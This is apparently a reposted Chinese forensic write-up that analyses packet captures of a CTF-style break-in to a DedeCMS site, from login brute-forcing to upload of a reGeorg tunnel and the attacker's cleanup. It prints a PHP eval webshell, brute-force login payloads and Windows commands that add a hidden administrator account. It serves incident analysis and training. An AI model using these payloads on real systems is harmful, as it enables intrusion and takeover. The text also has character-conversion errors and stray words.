數據分析-企業滲透過程
數據分析-企業滲透過程php
前記
本篇文章對真實企業滲透流量進行分析,其中包括最開始的目錄爆破,到最後的反向代理文件上傳成功html
題目要求
黑客拿到一臺服務器的權限,以後進行了內網滲透 1.被攻擊的服務器的內網地址 2.被攻擊的服務器的外網地址 3.攻擊者的ip地址 4.爆破出的後臺地址 5.爆破出的後臺登陸用戶名和密碼 6.webshell的完整路徑 7.被攻擊服務器的主機名 8.被攻擊服務器的網站根目錄 9.黑客得到的權限
數據分析
題目給了大約6個G的數據文件
直接盲目追蹤tcp流顯然是很是愚鈍的方式。
咱們的首要目標應該是篩選出攻擊者ip和受害者ip
從而實現有效的定點溯源
而日誌文件這個時候就成了很好的切入點web
日誌文件打開切入點
咱們選擇日誌文件查看
排除內網地址,咱們能夠看到ipshell
202.99.27.194
瘋狂對網站發起請求
因而基本能夠肯定此ip爲攻擊者
因而咱們去wireshark中過濾出相應的攻擊流服務器
第一個數據包分析
打開第一個數據流,咱們嘗試命令app
ip.src == 202.99.27.194 && http
能夠發現大量流量以下圖
不難發現受害者內網ip爲tcp
172.16.60.199
同時得知黑客攻擊的第一步爲fuzz目標網站目錄
而後咱們調用wireshark的http負載分配功能
而後咱們調用wireshark的http負載分配功能
不可貴出,受害者外網ip爲工具
118.194.196.232
至此咱們已經完成了題目的前3題:post
1.被攻擊的服務器的內網地址
2.被攻擊的服務器的外網地址
3.攻擊者的ip地址
答案:
172.16.60.199
118.194.196.232
202.99.27.194
第二個數據包分析
而後題目要求咱們找出後臺地址
故此咱們使用過濾條件
故此咱們使用過濾條件
ip.src == 202.99.27.194 && http
不難發如今第二個數據文件中,有以下結果
黑客不斷對 /simplexue/login.php網站
進行post數據
咱們查看post內容,隨便選取一個http請求頭查看
POST /simplexue/login.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://118.194.196.232:800/simplexue/login.php Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 73 gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=qwerty
不難看出黑客在嘗試密碼爆破
userid=admin&pwd=qwerty
故此猜想出,該地址爲受害者網站後臺
而後咱們繼續追蹤,查看黑客是否爆破登陸成功
過濾指令以下:
而後咱們繼續追蹤,查看黑客是否爆破登陸成功
過濾指令以下:
ip.src == 202.99.27.194 && http.request.method=="POST"
而後咱們將結果按照爆破時間排序
發現最後一次post結果爲
gotopage=&dopost=login&adminstyle=newdedecms&userid=admin&pwd=admin123&sm1=
即
userid=admin&pwd=admin123
而且發現發現響應包
Set-Cookie: DedeUserID=1; expires=Wed, 10-Aug-2016 02:36:28 GMT; path=/
其中
故此判斷應該登陸成功
而且看到後面的標題
DedeUserID=1
而且看到後面的標題
<title>DedeCMS........</title>
還能發現受害者網站使用了DedeCMS
第四個數據包分析
爲何沒有第三個數據包分析= =
由於第三個是黑客在尋找後臺功能,最終找到可上傳文件點
這裏就直接看第4個數據包了,由於基本都有涉及
咱們使用以下指令
ip.src == 202.99.27.194 && http.request.method=="POST"
不難發現
咱們查看
/simplexue/file_manage_control.php
能夠發現黑客上傳的http請求頭
POST /simplexue/file_manage_control.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------76031573231889 Content-Length: 591 -----------------------------76031573231889 Content-Disposition: form-data; name="activepath" /uploads -----------------------------76031573231889 Content-Disposition: form-data; name="fmdo" upload -----------------------------76031573231889 Content-Disposition: form-data; name="upfile1"; filename="jian.php" Content-Type: application/octet-stream <?php eval($_POST[g]);?> <?php eval($_POST[g]);?> <?php eval($_POST[g]);?> -----------------------------76031573231889 Content-Disposition: form-data; name="B1" ........ -----------------------------76031573231889--
黑客上傳了一個名爲jian.php
一句話木馬文件
其中代碼爲
4.爆破出的後臺地址
5.爆破出的後臺登陸用戶名和密碼
答案:
/simplexue/login.php
userid=admin&pwd=admin123
咱們接着查看下一題
6.webshell的完整路徑
咱們查看黑客的第一條指令的http頭
咱們查看黑客的第一條指令的http頭
POST /uploads/jian.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 12 g=phpinfo();
不難發現黑客執行了phpinfo()命令
返回中能夠看到
<b>Notice</b>: Use of undefined constant g - assumed 'g' in <b>C:\phpStudy\WWW\dedecms\uploads\jian.php</b> on line <b>1</b><br />
便可發現webshell的絕對路徑
C:\phpStudy\WWW\dedecms\uploads\jian.php
而後咱們依次查看黑客執行的命令
Form item: "g" = "system("whoami");" system("net user test test /ad"); system("net localgroup administrators test /ad"); system("net user test"); system("netstat -ano");
不難發現黑客添加了管理員用戶,帳號密碼爲test test
而且 netstat -ano
內容爲
Proto Local Address Foreign Address State PID TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1512 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 960 TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4008 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1039 0.0.0.0:0 LISTENING 668 TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1608 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 4088 TCP 172.16.60.199:80 202.99.27.194:41601 ESTABLISHED 392 TCP 172.16.60.199:135 172.16.60.199:3869 ESTABLISHED 960 TCP 172.16.60.199:139 0.0.0.0:0 LISTENING 4 TCP 172.16.60.199:3144 95.80.107.117:3389 ESTABLISHED 1108 TCP 172.16.60.199:3160 193.124.23.254:3389 ESTABLISHED 1108 TCP 172.16.60.199:3162 200.27
發現開放端口:80 135 443 445 1039 3306 3389
爲了更加詳細的瞭解目標網站的存在問題
咱們導出phpinfo文件
保存爲1.html
便可發現
Windows NT SIMPLE-W7LOIJIF 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 1) i586
能夠發現主機名爲 SIMPLE-W7LOIJIF
至此
9道題目所有完結
9道題目所有完結
繼續探索
可是咱們的深刻研究之路還未結束,咱們繼續日後發掘
在第6個數據包裏
咱們執行過濾指令以下
ip.src == 202.99.27.194 && http
不難看到,黑客再次使用了上傳功能
其中咱們看見上傳內容
其中咱們看見上傳內容
POST /simplexue/file_manage_control.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=upload&activepath=%2Fuploads Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------102512441528556 Content-Length: 6315 -----------------------------102512441528556 Content-Disposition: form-data; name="activepath" /uploads -----------------------------102512441528556 Content-Disposition: form-data; name="fmdo" upload -----------------------------102512441528556 Content-Disposition: form-data; name="upfile1"; filename="tunnel.php" Content-Type: application/octet-stream <?php /* _____ ____ ______ __|___ |__ ______ _____ _____ ______ | | | ___|| ___| || ___|/ \| | | ___| | \ | ___|| | | || ___|| || \ | |
根據上傳文件名,咱們百度進行搜索
發現這是一個內網反向代理的文件
工具名爲:http_reGeorg
而後咱們又在最後一個數據包裏發現了黑客對反向代理文件的操做以下圖
最後黑客利用file_manage_control.php
刪除了本身上傳的反向代理文件tunnel.php
POST /simplexue/file_manage_control.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=tunnel.php&activepath= Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 74 fmdo=del&activepath=&filename=tunnel.php&imageField1.x=34&imageField1.y=17
而後,黑客刪除了本身添加的用戶
Form item: "g" = "system("net user test /del");" Form item: "g" = "system("net user");"
最後,黑客再次利用file_manage_control.php刪除了本身的一句話木馬文件
POST /simplexue/file_manage_control.php HTTP/1.1 Host: 118.194.196.232:800 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://118.194.196.232:800/simplexue/file_manage_view.php?fmdo=del&filename=jian.php&activepath=%2Fuploads Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1; PHPSESSID=hclgsc0gbrgg4fohi9jpf6lp34; DedeUserID=1; DedeUserID__ckMd5=017c4976c44b20da; DedeLoginTime=1470710188; DedeLoginTime__ckMd5=9e010954dc011063; ENV_GOBACK_URL=%2Fsimplexue%2Fmedia_main.php%3Fdopost%3Dfilemanager Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 82 fmdo=del&activepath=%2Fuploads&filename=jian.php&imageField1.x=31&imageField1.y=17
至此全滲透過程結束
後記
整體來講,黑客作了以下事情
1.目錄爆破 2.爆破後臺管理員帳戶 3.尋找利用後臺可利用功能 4.一句話木立刻傳 5.利用木馬在目標機器上添加管理員用戶 6.黑客上傳反向代理文件 7.黑客進行內網滲透 8.黑客結束滲透,進行尾部處理工做
任重而道遠!
文章轉載自(http://skysec.top/2018/04/21/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90-%E4%BC%81%E4%B8%9A%E6%B8%97%E9%80%8F%E8%BF%87%E7%A8%8B/)
相關文章
- 1. 流量分析-企業滲透過程
- 2. 企業級無線滲透與無線數據淺析
- 3. 企業爲什麼要做滲透測試?從滲透內容看企業做滲透測試的重要性
- 4. 網絡安全——企業滲透一
- 5. 網絡安全——企業滲透二
- 6. 滲透測試過程
- 7. 企業數據分析流程與高級分析模型
- 8. python數據分析企業面試題
- 9. 小企業須要數據分析嗎?
- 10. Nmap之數據庫滲透
- 更多相關文章...
- • Swift 析構過程 - Swift 教程
- • SQLite 分離數據庫 - SQLite教程
- • TiDB 在摩拜單車在線數據業務的應用和實踐
- • Flink 數據傳輸及反壓詳解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 流量分析-企業滲透過程
- 2. 企業級無線滲透與無線數據淺析
- 3. 企業爲什麼要做滲透測試?從滲透內容看企業做滲透測試的重要性
- 4. 網絡安全——企業滲透一
- 5. 網絡安全——企業滲透二
- 6. 滲透測試過程
- 7. 企業數據分析流程與高級分析模型
- 8. python數據分析企業面試題
- 9. 小企業須要數據分析嗎?
- 10. Nmap之數據庫滲透